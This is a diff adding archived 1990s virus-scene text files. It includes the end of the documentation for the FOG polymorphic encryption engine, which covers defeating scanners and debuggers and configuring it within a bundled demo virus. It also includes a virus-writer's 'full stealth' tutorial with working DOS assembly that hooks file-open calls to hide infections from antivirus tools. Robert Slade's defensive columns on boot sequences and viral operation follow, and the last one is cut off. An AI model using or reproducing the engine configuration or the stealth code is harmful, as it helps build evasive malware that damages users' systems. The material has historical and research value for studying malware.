+	the encryptors very variable indeed. Cryptanalysis is going to
+	be hard on this one, as there is between 1 and 15 random
+	xor/sub/add/rol operations with different keys on each element
+	to be encrypted. With the change of just one constant in the
+	enclosed source this number can be much increased.
+
+
+	* Junk instruction generation
+	The junk instructions, generically generated by FOG, includes
+	instructions of 1, 2, 3, 4, 5 and even 2*7 bytes, and FOG can
+	generate up to 255 such junk instructions between *each*
+	good instruction. I've had test decryptors varying between
+	20 bytes and 10k (!).
+
+
+	* Configurable
+	FOG is configurable in most aspects. Based on what you tell it, it
+	will behave very differently from configuration to configuration.
+
+	Examples:
+
+	1.      mov     al, sw_nogarb
+		call    fog_init
+
+	This will cause FOG to generate short decryptors without any garbage
+	or debugger hostile instructions at all. Turning off garbage also turns
+	off debugger hostility, so any value in AH will be ignored. The
+	encryption will however be just as strong as before, and the decryptor
+	will still mutate.
+
+	2.      mov     al, sw_007_gi
+		mov     ah, sw_int3 or sw_prefetch
+		call    fog_init
+
+
+	This setting will cause FOG to generate between 1 and 7 junk
+	instructions between each good one. Randomly interspersed in
+	these junk instructions will be some debugger hostile instructions,
+	in this case int 3's and prefetch traps. The int 3's are just
+	bothersome when debugging, the prefetch traps will fool the unin-
+	telligent debuggers and some of those programs who try to auto-
+	matically decrypt the encrypted code; TbClean crashes spectacularly.
+
+
+	3.      mov     al, sw_255_gi
+		mov     ah, sw_debug
+		call    fog_init
+
+	This setting will cause FOG to generate medium to very big
+	decryptors, as there will be between 1 and 255 garbage instructions
+	between each good instruction. However, setting ah to sw_debug causes
+	the garbage generated to not contain any debugger hostility at all,
+	and *no encryption will be performed*.
+
+	4.      mov     cl, (sw_r_garb or sw_r_host)
+		call    fog_init
+
+	This will tell FOG to ignore any settings of AH or AL, and randomly
+	choose a setting for itself. Thus the setting may be one of extreme
+	garbage generation and/or hostility or the opposite. Note that FOG
+	will behave according to this until next time you call fog_init, and
+	another random setting will be chosen. If used in a virus, his would
+	have the effect that samples of one generation could be *totally*
+	different from samples of another generation
+
+
+	5.      mov     cl, sw_const_s
+		call    fog_init
+
+	This will cause FOG to generate decryptor+encrypted code of
+	constant size each time you encrypt. This will be of use for
+	stealth virus production. Fog manages this by padding all 
+	encryptions up to the point where it's very unlikely that a 
+	bigger decryptor will be created. Note that with high junk 
+	configuration there often will be a nauseatingly huge pad area 
+	at the end of files.
+
+	6.      mov     cl, sw_align16
+		call    fog_init
+
+	Some people make viruses that need to be padded up to a paragraph
+	border, for self recognition or other purposes. With this setting
+	FOG will do that.
+
+	7.      mov     cl, sw_align256
+		call    fog_init
+
+	Same as previous, but with 256 byte page borders.
+
+
+
+	* Generic programming
+
+	This engine is released with the commented original source code.
+	It's of course possible to improve the engine, and it's relatively
+	easy to do so around its current framework. For instance is the garbage
+	generation modular, by adding another module and updating the jump
+	addresses FOG will spew out the new instructions just as easy and
+	randomly as those included in the source. You may also note the
+	vacant switches, where you may add more configurable options.
+	One of FOG's strongest points is just this; by releasing the source
+	it will mutate not just decryptors, but with time also it's own
+	functionality.
+
+
+	WEAK POINTS:
+
+	* Decryptor obviousness
+
+	Decryptors generated with this engine do not have any mechanisms to
+	hide that they are decryptors (except junk). They do not generate
+	any codesequence to fool scanners into believing that this is a
+	legitimate program. Thus, heuristic scanners may smell a rat,
+	especially TbScan when FOG uses low junk/hostility settings.
+	TbScan detects the presence of a decryptor and sometimes succeed
+	to decrypt the encrypted program. On high junk/hostility settings,
+	however, TbScan mostly chokes and dies. The prefetch traps generate 
+	much noise, in the sense that they mess with memory and cause TbScan 
+	to whip out @, 1, D and U flags galore. On rare occasions they also
+	cause the program to terminate or even hang. I have included jmp
+	instructions in the standard set of functions from FOG, however
+	these sometimes generate TbScan @ and J flags.
+
+	* Scanning vulnerability
+
+	When high debugger hostility is chosen, FOG generates fixed
+	codesequences that might be scanned for, particularly the
+	prefetch traps. This might be something to have in mind.
+
+	* Huuuuuuge decryptors
+
+	As mentioned before, with high garbage settings FOG may generate
+	very large decryptors indeed. This may cause not only a considerable
+	file growth, but also a noticeable timelag upon decrypting.
+
+	* Statistical analysis vulnerability
+
+	There is a chance that FOG will be vulnerable to statistical analysis.
+	I have not performed any statistical computations on FOG's decryptors
+	myself, but I think this might be done. However, scanners will have
+	a hard time detecting *all* FOG encrypted viruses, due to FOG's
+	variability.
+
+
+
+
+
+
+	THE DEMO VIRUSES:
+
+	Enclosed you will find the source and executables of different
+	versions of AirRaid, which is the demo virus for this engine.
+
+	AirRaid is a non-destructive resident *.com infector, made
+	specifically for this purpose. Its lameness is also by intent.
+	It will infect any *.com file (of proper size) executed. Infection
+	marker is 'AR' at byte 4 and 5 in the file.
+
+	The different versions are made to demonstrate the easy way you
+	can configure the virus to do what you want.
+
+	Ver 1. Plain virus, Fog not attached.
+	Ver 2. Fog attached, configured to no garbage.
+	Ver 3. Fog attached, configured to 15 garbage instructions,
+	       max hostility, fixed length
+	Ver 4. Fog attached, configured to random garbage, random hostility.
+
+
+
+
+
+	SWITCHES (as defined in the switches.inc file):
+
+			       AH              AL
+   Debugger hostility   F E D C B A 9 8  7 6 5 4 3 2 1 0     Junk generation
+   Unused ��������������� � � � � � � �  � � � � � � � �   1 junk instruction
+   Unused ����������������� � � � � � �  � � � � � � ���   3 junk instructions
+   Unused ������������������� � � � � �  � � � � � �����   7 junk instructions
+   Use dos interrupts ��������� � � � �  � � � � �������  15 junk instructions
+   Unused ����������������������� � � �  � � � ���������  31 junk instructions
+   Prefetch traps ����������������� � �  � � �����������  63 junk instructions
+   Unused ��������������������������� �  � ������������� 127 junk instructions
+   Int 3 generation �������������������  ��������������� 255 junk instructions
+
+
+			       CH              CL
+   Internal switches    F E D C B A 9 8  7 6 5 4 3 2 1 0   General switches
+   Unused ��������������� � � � � � � �  � � � � � � � �   random junk
+   Unused ����������������� � � � � � �  � � � � � � ���   random hostility
+   Unused ������������������� � � � � �  � � � � � �����   exe file
+   Unused ��������������������� � � � �  � � � � �������   constant size
+   Unused ����������������������� � � �  � � � ���������   256 byte alignment
+   Down decryptor ����������������� � �  � � �����������   16  byte alignment
+   Use displacement ����������������� �  � �������������   Unused
+   No jumps allowed �������������������  ���������������   Unused
+
+
+
+	That's all for now. Take a look at the enclosed demo virus, AirRaid,
+	to see how FOG can be used.
+
+
+	ABOUT THE AUTHOR:
+
+	I am a tertiary student from Australia's Sunshine State of
+	Queensland.  My interests include Rugby League, Cricket and
+	low-level programming.  Normally concentrating on visual and
+	audio demonstrations, I turned my hand to polymorphism due to
+	the unique challenge of that type of coding.  I will only
+	continue to pursue my virus programming career while the field
+	remains interesting.
+
+
+
+	HOW TO CONTACT THE AUTHOR:
+
+	You can only contact me via my friend Qark, who is has internet
+	access unlike myself.
+
+
+
+Included in the original package there should be 12 files:
+
+	 FOG     .ASM          Fog source code
+	 FOG     .DOC          This file
+	 FOG     .OBJ          Fog object module
+	 SWITCHES.INC          Switch definition include file
+
+	 AIRRAID1.ASM          AirRaid ver. 1 source
+	 AIRRAID2.ASM          AirRaid ver. 2 source
+	 AIRRAID3.ASM          AirRaid ver. 3 source
+	 AIRRAID4.ASM          AirRaid ver. 4 source
+
+	 AIRRV1.ZIP            AirRaid ver. 1 samples
+	 AIRRV2.ZIP            AirRaid ver. 2 samples
+	 AIRRV3.ZIP            AirRaid ver. 3 samples
+	 AIRRV4.ZIP            AirRaid ver. 4 samples
+
+
+Any other file is not acknowledged by me.
+
+Eclipse.
+Queensland, Australia, June 1995.
+
+
diff --git a/textfiles.com/virus/fullstlt.txt b/textfiles.com/virus/fullstlt.txt
new file mode 100644
index 00000000..9e83f28b
--- /dev/null
+++ b/textfiles.com/virus/fullstlt.txt
@@ -0,0 +1,254 @@
+% Full stealth tutorial by Blonde %
+�����������������������������������
+What follows is kinda tutorial of disinfection-stealth. It
+doesn't cover any *redirection* stealth (such as the one Bluenine
+in IR#6 uses), and quite frankly it might not be the best tutorial
+the vx-community has seen, but we can always hope it's for some
+gain to someone.
+
+Alternative code how physical disinfection can be done is presented
+in my Hybris virus, which also is a bit more optimized than this one :-).
+Nevertheless, this is the very same technique my Petra.1308 virus used,
+so atleast it works..
+
+I've edited this one a bit (Yea, I know it doesn't look like I did,
+but I did!) and well, we can always hope Mr.Blonde will write his
+next tutorial in a sober-mode :-).
+
+- The Unforgiven.
+
+
+
+
+             - Full Stealth or Disinfection on open -
+                 Written by Blonde/Immortal Riot
+
+
+
+
+
+Introduction
+������������
+Okey, this is for those guys who've already made an effective size-stealth
+and want some more or those who just like reading ;)
+
+Full stealth for me is when you completely remove the virus from the file.
+Preferebly done when you open it. The idea behind this is ofcourse that it
+will be harder to spot and it is for the common users, but thats all we want
+isn't it?
+
+What's very important when using disinfection is to infect on close or else
+you'll of course end up with some major problems ;) Okey, this is a bit more
+complex than the size stealth I discussed in my earlier article and I'm not
+a teacher so this can be quite hard to understand.
+
+I'll mainly go through the disinfection of a COM file, but with
+pseudo code for EXE files as well. All code presented will though be COM-
+only.
+
+The basic idea behind disinfection of COM-files is to first of all check
+if the file is infected by your virus, then simply restore what we've changed
+in the file, that is the first 3-5 bytes in a COM and then simply truncate
+the file at (filesize-virussize).
+
+As for EXE-files the scenario is exactly the same, restore what you
+changed in the EXE-header rewrite it to the file... and truncate it.
+
+
+To succeed in these matters you'll have to hook int 21h and tap ah=3d (open)
+
+
+Check-For-Infection
+�������������������
+disinfect_3d:           ;called by our int handler if ah=3dh
+
+                    ;Upon entry to ah=3Dh ds:dx points to the filename...
+
+
+        push ax bx cx dx di si ds es            ;save registers in use
+
+        push ds
+        pop es  ;es=ds
+        mov di,dx
+        mov al,'.'
+        mov cx,64
+        repne scasb             ;this will repeatedly scan byte by byte for
+                    ; '.' in the filename stored in ds:dx=es:di
+                    ;di will then point to offset of '.'+1
+
+        cmp word ptr ds:[di],'OC'
+        jne nocom
+        cmp word ptr ds:[di],'M'
+        je openfile                     ;check if it is a com... if it wasn't
+      nocom:
+        jmp not_opened                  ;it wasn't a *.com file so don't
+                                        ;disinfect
+
+      openfile:                         ;com-file being opened!
+        pushf
+        push cs
+        mov ax,3d02h
+        call org21h                     ;open file in read/write mode
+        jc nocom                        ; error ==> bail out
+
+        xchg ax,bx
+
+        push cs cs                      ;cs=ds=es
+        pop es ds
+
+        mov ax,5700h                    ;get file's time & date
+        int 21h
+        push cx                         ;save time &
+        push dx                         ;date on the stack
+
+      read_4f:
+        mov ah,3fh                      ;just read the firstfour bytes to
+        mov cx,4                        ;a buffer.
+        mov dx,(hostbytes-vstart)
+        int 21h
+
+      chk_4_markers:
+        cmp byte ptr ds:[hbytes-vstart],0e9h            ;check if firstchar
+
+        jne close_file                                  ;is a jmp (e9)
+                                                        ;if not ==> bail!
+
+        cmp byte ptr ds:[hbytes-vstart+3],fileid        ;4th byte = our marker?
+
+        jne close_file                                  ; if not ==> bail!
+
+
+That was the first part of the disinfection routine, the part that check if
+the file *really* is infected. In a nutshell, the code works like this:
+
+First of all we want to check if the file first of all is a COM/EXE file.
+
+What we did was simply to scan ds:dx for the '.' which separates the filename
+from the file extension and then compare it to COM/EXE (the code only checks
+for com's, but you can fix that ;). That'll be sufficent to determine if it
+was a COM/EXE file...
+
+The next step would be to check if the COM/EXE file really is infected.
+This can be done in diffrent ways and some more secure than others, but what
+I've done in this code is to read the  first four bytes and check the first
+against a jmp instruction (the one which jumps to the first instruction in
+the main virus-code) and then check the fourth against 'fileid' a byte which
+I write to every file I infect... com only of course.
+
+That should do it. To be even more secure one could check for size and
+even stealth markers (like seconds) and such, but I don't think it's so
+very likely that a com file starts first with a jmp and then as the forth
+byte have another byte equal to what we want... Ah well it might corrupt
+some files, but who cares? ;)
+
+Note that we don't do a regular open, since that would be recursive we have to
+call the original interrupt handler directly...
+
+To do the same for EXE-files is almost as easy... read the whole header
+(be sure to save the header-information in the file for this purpose,
+don't do any heap-optimizing) and check against your markers maybe the
+prelocated SP or maybe the negative checksum or whatever... then continue
+with the disinfection where we left the com files...
+
+Restore Init-Bytes
+������������������
+      read_hostbytes:
+        mov ax,4202h
+        xor cx,cx
+        cwd
+        int 21h                         ;ax=fsize
+
+        push ax                         ;push fsize.. used lateron...
+                        ;if exe then push dx too
+        xchg ax,dx
+
+        sub dx,(vend-hbytes)
+        mov ax,4200h
+        xor cx,cx
+        int 21h                         ;goto dx in files...
+
+        mov ah,40h
+        mov cx,4
+        mov dx,(hbytes-vstart)
+        int 21h                         ;read host bytes from end of file...
+
+This is the part where you fetch the original values of infected file. Since
+this is important, also remember to leave the original bytes un-encrypted if
+the virus is encrypted. Else you'll have to decrypt them, which is pretty
+stupid. Encrypted full-stealth viruses might be considered a bit overdoing it,
+but well, that's up to you to decide. It's also wise to place the init-bytes
+at the end-of the file because that makes file-seek's operations shorter.
+
+Well anyways, first get the filesize in ax then load it in dx and sub dx with
+the byte difference from the very end of the virus to the begining of
+the hostbytes (in this case 4...) then go to that offset in the file ie.
+four bytes from the end and then read those four bytes which are the files
+original bytes... if it wasn't a COM I wouldn't xor cx,cx and I would also use
+a sbb cx,0 since fsize might be larger than 64k ;) else there isn't anymore
+differences. you'll just have to sub/read the appropriate number of bytes...
+
+The next step will be to restore those bytes to the begining of the file...
+
+        mov ax,4200h
+        xor cx,cx
+        cwd
+        int 21h                 ;go to beginning of file...
+
+        mov ah,40h
+        mov dx,(hbytes-vstart)
+        mov cx,4
+        int 21h                 ;restore them
+
+Well that' obvious, wasn't it?
+The EXE version would only differ if you didn't save the whole EXE-header,
+because then you would have to read it, then restore the real values and
+re-write it to file then... therefor is it easier to simply write the whole
+EXE-header to the end of the infected file, but that'll of course increase
+the size of the virus.
+
+Remove the virus from the host-file
+�����������������������������������
+To truncate the file at filesize-virussize we do this...
+
+        pop dx          ;this was push'd two snippets up and it's the file-size
+                        ;should also pop cx if it was an exe
+
+        mov ax,4200h
+        sub dx,virusize ;subtract the virus-size from the filesize
+        int 21h         ;go to filsize-virusize
+
+      truncate:
+        mov ah,40h
+        xor cx,cx
+        int 21h         ;this is the trick. to truncate simply write zero bytes
+                        ;to the file...
+
+Okey it's simple... restore the filesize we pushed earlier (both cx,dx if EXE)
+and then sub it with the virus size (don't forget sbb cx,0 if EXE...)
+Then go to that offset and write zero bytes to it, that'll truncate it...
+
+      close_dis:
+        mov ax,5701h
+        pop dx cx
+        int 21h         ;restore time/date stamp
+
+        mov ah,3eh
+        pushf
+        push cs
+        call org21h     ;close call to real int handler
+
+      no_opendis:
+        pop es ds si di dx cx bx ax
+        jmp org21h
+
+You're finished! just restore the time/date stamp and close the file...
+Just don't forget to close via a direct call to the real int 21 handler, since
+you wouldn't want to re-infect the file ;) then we chain into the real dos
+open since the virus has been removed!
+
+This code will successfully disinfect any file opened by ah=3Dh/int 21h, but
+there are other ways of opening files, one of them is extended open which
+F-Prot uses, ax=6c00h/int 21h. It's possible to trap it too, but then you'll
+have to deal with some minor snags. Like loading ds:dx with filename ... If
+you're intrested check out Salamander Four...
+
diff --git a/textfiles.com/virus/funbot2.cvp b/textfiles.com/virus/funbot2.cvp
new file mode 100644
index 00000000..dc0ac1a7
--- /dev/null
+++ b/textfiles.com/virus/funbot2.cvp
@@ -0,0 +1,56 @@
+FUNBOT2.CVP   910918
+
+                          Boot sequence
+
+In order to point out the areas of possible viral program attack, it is
+helpful to outline the sequence of operations in the boot process.
+
+When the machine is first powered up, there is a certain amount of
+programming contained in boot ROM.  The amount of this varies greatly
+between different types of machines, but basically describes the most
+central devices, such as the screen and keyboard, and "points" to the
+disk drives.  A very basic location on the disk is addressed for further
+information.  This is the generic "boot sector"; as mentioned in the last
+column, on MS-DOS hard disks it is the partition boot record that is
+accessed first.
+
+The boot record or sector contains further information about the
+structure of the disk.  It, or a subsequent linked sector, also describes
+the location of further operating system files.  This description is in
+the form of a program, rather than simply data.  Because this outline is
+in the form of a program, and because this sector is "writable", in order
+to allow for different structures, the boot record or sector is
+vulnerable to attack or change.  Boot sector infecting programs may
+overwrite either the boot record or the boot sector, and may or may not
+move the original boot sector or record to another location on disk.  The
+repositioning of the original sector's program allows the viral program
+to "pretend" that everything is as it was.
+
+This pretence is not absolute.  A computer with an active viral program
+resident will, of necessity, be different in some way from the normal
+environment.  The original sector position will, of course, have
+different information in it.  The viral program will need to "hook"
+certain vectors for its own use in order to monitor activity within the
+computer and in order to function.  The viral program will have to occupy
+a certain portion of memory, and may be identified by a memory map, or,
+in the case of the Stoned virus, may try to hide by "telling" the
+computer that it has less memory than is actually the case.
+
+These tell-tale indicators are not absolute.  There may be various
+reasons why the "top of memory" marker is set to less than 640K.  Each
+different type of disk drive, and each drive of the same type which is
+partitioned differently, will have a different boot record.  As operating
+systems or versions change, so will the boot sector.  Therefore, the
+environment of newly booted machines cannot, in isolation, be examined
+and said to be infected or free from infection.
+
+It is possible, however, to compare any machine with itself in a "known
+clean" state.  By saving information on the environment after a minimal
+clean boot, and comparing this with subsequent boots, changes can be
+detected, and the user alerted to a potential problem.  Since a boot
+sector infector can only infect a machine if the machine is booted from
+an infected disk, it is also possible to replace the boot record with a
+non-standard one, in order to prevent access to the hard disk unless
+booted from the hard disk.
+
+copyright Robert M. Slade, 1991   FUNBOT2.CVP   910918 
\ No newline at end of file
diff --git a/textfiles.com/virus/funbot3.cvp b/textfiles.com/virus/funbot3.cvp
new file mode 100644
index 00000000..b6026dbb
--- /dev/null
+++ b/textfiles.com/virus/funbot3.cvp
@@ -0,0 +1,58 @@
+FUNBOT3.CVP   910918
+
+                        Boot sequence - part 2
+
+Obtaining the state of the environment immediately after the boot sector
+has been run is not as easy as it might sound at first.  The computer,
+while functional, does not have all parts of the operating system
+installed at this point, and it is the "higher" levels of the operating
+system that users generally interact with.
+
+The last section of the boot sector program points to the files or areas
+on the disk in which to find the next step of the operating system.  At
+this point the specific files and subsequent steps start to change from
+one operating system to another.  However, it is fairly common for all
+operating systems to have "hidden" files along this route which may be
+subject to viral attack.  Given that the files are not evident to the
+user, they are more subject, not to attack, but to an undetected change.
+
+When setting up antiviral defences, it is important to know the sequence
+of events in the boot process in order to know which programs will
+protect to which level.  The MS-DOS sequence provides the clearest
+example, and those knowledgeable in other systems can use the examples it
+provides in order to analyze the specific details of their own systems.
+
+After the master boot record and boot sector proper have been run, MS-DOS
+normally runs two additional programs which set up input/output routines
+and the most basic operating system.  (As these programs are called by
+the boot sector, it is possible to re-route this process to call
+specialized driver programs first, or with them.  Some esoteric disk
+drives use such a process.)  Traditionally, these files have "hidden"
+attributes and are not visible to the user on the disk.  After they have
+run, the system has sufficient programming to interpret a text file which
+contains listings of various additional programming which the user wishes
+to have in order to run specialized hardware.  This file, CONFIG.SYS, is
+the first point at which the intermediate user may normally affect the
+boot process, and is the first point at which antiviral software may be
+easily installed.  As can be seen, however, there are a number of prior
+points at which viral programs may gain control of the computer.
+
+After the programs listed in CONFIG.SYS are run, the command interpreter
+is invoked.  The standard MS-DOS interpreter is COMMAND.COM, but this may
+be changed by an entry in the CONFIG.SYS file.  After COMMAND.COM is run,
+the AUTOEXEC.BAT batch file is run, if it exists.  AUTOEXEC.BAT is the
+most commonly created and modified "boot file", and many users, and
+antiviral program authors, see this as the point at which to intervene. 
+It should be clear by now, however, that many possible points of
+intervention are open before the AUTOEXEC.BAT is run.
+
+In spite of the greater number of entry points, viral programs which
+attack the programs of the boot sequence are rare, and not greatly
+successful.  For one thing, while very disk has a boot sector, not every
+disk has a full boot sequence.  For another, different versions of a
+given operating system may have different files in this sequence.  (For
+example, the "hidden" files have different names in MS-DOS, PC-DOS and
+DR-DOS.)  Finally, viral programs which can infect ordinary programs
+files may not work on boot sequence files, and vice versa.
+
+copyright Robert M. Slade, 1991   FUNBOT3.CVP   910918 
\ No newline at end of file
diff --git a/textfiles.com/virus/fungen1.cvp b/textfiles.com/virus/fungen1.cvp
new file mode 100644
index 00000000..09275322
--- /dev/null
+++ b/textfiles.com/virus/fungen1.cvp
@@ -0,0 +1,56 @@
+FUNGEN1.CVP   910727
+
+           Computer operations and viral operations
+
+Having defined what viral programs are, let's look at what
+computers are, and do, briefly.  The functions that we ask of
+computers tend to fall into a few general categories.
+
+Computers are great at copying.  This makes them useful for
+storing and communicating data, and for much of the "information
+processing" that we ask them to do, such as word processing. 
+Computers are also great for the automation of repetitive tasks. 
+Programming allows computers to perform the same tasks, in the
+same way, with only one initiating call.  Indeed, we can, on
+occasion, eliminate the need for the call, as programs can be
+designed to make "decisions" on the basis of data available. 
+Finally, computer processors need not be specially built for
+each task assigned to them: computers are multi-purpose tools
+which can do as many jobs as the programs available to them.
+
+All computer operations and programs are comprised of these
+three components: copying, automatic operation, "decision"
+making: and, in various combinations, can fulfill many
+functions.  It is no coincidence that it is these same functions
+which allow computer viral programs to operate.
+
+The first function of a viral program is to reproduce.  In other
+words, to copy.  This copying operation must be automatic, since
+the operator is not an actively informed party to the function. 
+In most cases, viral program must come to some decision aobut
+when and whether to infect a program or disk, or when to deliver
+a "payload".  All of these operations must be performed
+regardless of the purpose for which the specific computer is
+intended.
+
+It should thus be clear that computer viral programs use the
+most basic of computer functions and operations.  It should also
+be clear that no additional functions are necessary for the
+operation of viral programs.  Taking these two facts together,
+noone should be surprised at the conclusion reached a number of
+years ago that not only is it extremely difficult to
+differentiate computer viral programs from valid programs, but
+that there can be no single identifying feature that can be used
+for such distinction.  Without running the program, or
+simulating its operation, there is no way to say that this
+program is viral and that one is valid.
+
+The fact that computer viral operations are, in fact, the most
+basic of computer operations means that it is very difficult to
+defend against intrusion by viral programs.  In terms of
+"guaranteed protection" we are left with Jeff Richards' Laws of
+Data Security:
+         1)   Don't buy a computer.
+         2)   If you do buy a computer, don't turn it on.
+
+copyright Robert M. Slade, 1991   FUNGEN1.CVP   910729 
\ No newline at end of file
diff --git a/textfiles.com/virus/fungen2.cvp b/textfiles.com/virus/fungen2.cvp
new file mode 100644
index 0000000000000000000000000000000000000000..4c0ed8302883a6ab07149a4d8db83ef024f53278
GIT binary patch
literal 2721
zcmZvePj4GH5XE~IpfAwVK$kXv;v_|ZHpt0M?8YeU7MAnpO6_tb)?890xl;A*`x{DY
z*=`I2l6J}A%zJO%@bc5m?-w^eoxT73mx#Q5^ZM7<KTjvq2|vE|_t_=mC2njo#l?_y
z>A5fKIIPxE)>dXQxs?mX&!n}T3r?3w?4*hPW+*nvwuacGxJsrcK(d`pSxS^-dD;$5
z-Ll+^DaABv7gqW*5<SVdZLVP)Cz>*yn5Kve{BT)%69VhjW~=*_)&}u5XURj;@YxMs
zH|gS-?Q#FWw?p{envl;#u5^JF%FK~kPRZ|L^6gxfF&4?TDKSkaE_C%<)>G}_%zkLr
z(#K@QcKX(BEn$DW_}BCs@;Rhyr<3c&%MX7pG=4vT6*aR(kN)lU{OU$bXk}4iu<bM0
z&SW}y7EG>91BAx+HAo;slcn+2BoZD<4g2N8#ifQC0KSQXZ%J3OajinkS0iP=0gdi)
ziDY}IaIO(GI}M}E<v66q3b>OaZwy3aNkb4bl-Q$@#&}Ov5D?J;pC;@z)9Ivj`CeDM
zkZmd!RLx09JYQ?}P_?4?A+(UX*ymz<`Q_||$_|daNh_Y``aI92M{gCg-jFi#vJcGh
zHrN7v_qt#@VTFH&X{B#YqS7g3YXd0Mx&qT;GnMrllm?A=Yh^B`<npVlfToH3>eJ2D
zS0R3{5;U4Lh~^EO+nUlSZYx7Zn$wBK?o8vn(hlIq^w`)})uR%PFf4ml9(1pdEU%}N
zDp=LjxqQA}j0@)S<^1N4IcL;3U`=E_DJvMoHtXR28Eig#fq<w(-haHkTHIZq%f;7=
z_v5w^yb6+P6UYEi)u^$|vL;Ol|Id%M)m?K{cudL~i%zvSapNd#w{}{C-P%xws*ujd
z*eYnmKO%9aEZ>|+tAU?$)|iy`^)y36BBi;8a7p4WOeY(&_tCTm&K}YjElJNB4MlhL
z+4?Qn0bZ5)N#W@G03)tZ&~WYPDp??@)`QZFZmXSBsuzwLsklAhtP%kL3O_2X_Ef|z
zA&XAfIvT3P>4Yq>MewY8p*g&mEzp{!A7!l;7t`n-&1lJEU*?M7H7OtM?Wy&08r=jv
z^!+ZmQt--IN4!S>W^-?6z;`b9j#8=4dh9I4;2JsuATam?oizpsxB`qFhA^FULn2m^
z9m%V$evCUPr?-@NJqF`#Fyof;O;6KQgW0(ezmxS1$ghe<A^|j8PErHbAvBV6d44CS
z&Ep_?>}2Gyh%|!PY_P>=wc|INWWxPH>BkO(Z2ljrH!a5(rycynuMkoMzv37cK#055
zdZbISKU6zg+Td1UrUG_awHh?YHx%IL6SUtAA)w{zPk<w{N2eY4A=f1W*aKPkp@_vD
zt2Nenv!aD|&ihLHt@Y?(Ygyab-8b8Yx?1bqQir*&t2tM1dfYcUClAm=6C>I78)gYM
zlo0%JG?4s5Bh~8hc3?{o3L0ey^#Ht8mEj$Z#xXU`JL>cXg&vQbtDpg*GCOi^o~Dlx
z>_Jc)pXsZk1xiPKIt<x+2QIabfT%VM9;!KSO=~F{BUI(+6kSxiS24=gBo~KVLse0+
zJOiO%`>cLf(|_5=)^*G^eZ=|w;EQ9Xb5N7^8+}?Ee#WfQfi|nVx0w99!~H;c2dvrw
zw0XTV=um`g6ADeBDa`VK6KwSw#SBa&V3{_I)8p+#$L+!Hbdcy2t<wTMCCk8qC7q|*
zj8xkrv7#KSt1+Ur*53S0gVf2RH-Y2b?BF?i2hl8x0aPwux?D|!*6-1{NqY*g4I`dn
z^<3o6B@TZuD+VtspBhai8t310HCz|DjVP|j^_eU@bj;<=+qZAHY+iojD*F9*{{e|+
BvKIgV

literal 0
HcmV?d00001

diff --git a/textfiles.com/virus/fungen3.cvp b/textfiles.com/virus/fungen3.cvp
new file mode 100644
index 00000000..f378d286
--- /dev/null
+++ b/textfiles.com/virus/fungen3.cvp
@@ -0,0 +1,53 @@
+FUNGEN3.CVP   910811
+
+                Viral use of operating systems
+
+Viral programs use basic computer functions in more ways than
+one.  It is easier to use standard system calls for purposes
+such as accessing disks and writing files or formatting.  Most
+programs use the standard operating system calls, rather than
+write their own system function when "using" the hardware.  For
+one thing, it's more "polite" to do this with applications
+programs, which, if they follow "the rules" will be better
+"behaved" when it comes to other programs, particularly resident
+programs and drivers.  But it is also easier to use system
+functions than write your own.
+
+Operating system functions are generally accessible if you know
+the memory address at which the function starts, or the specific
+"interrupt" that invokes it.  Viral programs can use this fact
+in two possible ways.
+
+The first is to use the standard system calls in order to
+perform the copying, writing or destructive actions.  This,
+however, has unfortunate consequences for the viral author (and
+fortunate for the computer community) in that it is easy to
+identify these system calls within program code.  Therefore, if
+viral programs used only this method of operation, it would be
+possible to write a "universal" virus scanner which would be
+able to identify any potentially damaging code.  It would also
+be possible to write programs which "trapped" all such system
+calls, and allowed the user to decide whether a particular
+operation should proceed.  (In fact, in the MS-DOS world, two
+such programs, BOMBSQAD and WORMCHEK, are available, and were
+used to check for early trojan programs.)
+
+Operating systems are, however, programs, and therefore it is
+possible for any program, including any viral program, to
+implement a completely different piece of code which writes
+directly to the hardware.  The "Stoned" virus has used this very
+successfully.
+
+Unfortunately, viral programs have even more options, one of
+which is to perform the same "trapping" functions themselves. 
+Viral programs can trap all functions which perform disk access
+in order to hide the fact that the virus is copying itself to
+the disk under the "cover" of a directory listing.  Viral
+programs can also trap system calls in order to evade detection. 
+Some viri will "sense" an effort to "read" the section of memory
+that they occupy, and will cause the system to hang.  Others
+trap all reading of disk information and will return only the
+"original" information for a file or disk: the commonly named
+"stealth" viral technology.
+
+copyright Robert M. Slade, 1991   FUNGEN3.CVP   910811 
\ No newline at end of file
diff --git a/textfiles.com/virus/fungen4.cvp b/textfiles.com/virus/fungen4.cvp
new file mode 100644
index 00000000..74945a65
--- /dev/null
+++ b/textfiles.com/virus/fungen4.cvp
@@ -0,0 +1,52 @@
+FUNGEN4.CVP   910819
+
+                     Hiding in System Layers
+
+One additional use that viral programs can make of operating
+systems is as a source of hiding places.
+
+Anyone who has ever tried to manage accounts on mainframes or
+local area networks will recognize that there is a constant
+battle between the aspects of security and "user friendliness" in
+computer use.  This tension arises from the definition of the two
+functions: if a computer is easy to use, it is easy to misuse. 
+If a password is hard to guess, it is hard to remember.  If
+access to information is simple for the owner, it is simple for
+the "cracker".
+
+(This axiom often gives rise to two false "corollaries".  First,
+the reverse; that those systems which are difficult to use must
+therefore be more secure; does not hold.  Secondly, many assume
+that restricting the availability of information about a system
+will make that system secure.  While this strategy will work in
+the short term, its effectiveness as protection is limited. 
+Indeed, it often has the unfortunate side effect of restricting
+information to those who should have it, such as systems
+managers, while slowing the "attackers" only marginally.)
+
+"User friendly" programs and operating systems tend to hide
+information from the user.  There are two reasons for this.  In
+order to reduce "clutter", and the amount of information that a
+user needs to operate a given system, it is necessary to remove
+options, and therefore, to a certain extent, functionality.  A
+user friendly system is also more complex in terms of it's own
+programming.  In order for the computer to behave "intuitively",
+it must be able to provide for the many "counter-intuitive" ways
+that people work.  Therefore the most basic levels of a graphical
+user interface system tend to be more complex than the
+corresponding levels of a command line interface system, and are
+hidden from the user by additional intervening layers (which also
+tend to add more  complexity.)
+
+The additional layers in an operating system, and the fact that
+a great deal of management takes place automatically, without the
+user's awareness, is an ideal situation for a viral program. 
+Since many legitimate and necessary operations and changes are
+performed without the user being aware of it, viral operations
+can also proceed at a level completely hidden from the user. 
+Also, because the user is basically unaware of the structure and
+operations of the computer, changes to that structure and
+operation are difficult to detect.
+
+copyright Robert M. Slade, 1991   FUNGEN4.CVP   910819
+ 
\ No newline at end of file
diff --git a/textfiles.com/virus/fungen5.cvp b/textfiles.com/virus/fungen5.cvp
new file mode 100644
index 00000000..49474e32
--- /dev/null
+++ b/textfiles.com/virus/fungen5.cvp
@@ -0,0 +1,57 @@
+FUNGEN5.CVP   910828
+
+                        Viral activation
+
+In attempting to protect against viral infection, and
+particularly when trying to disinfect systems, it is important to
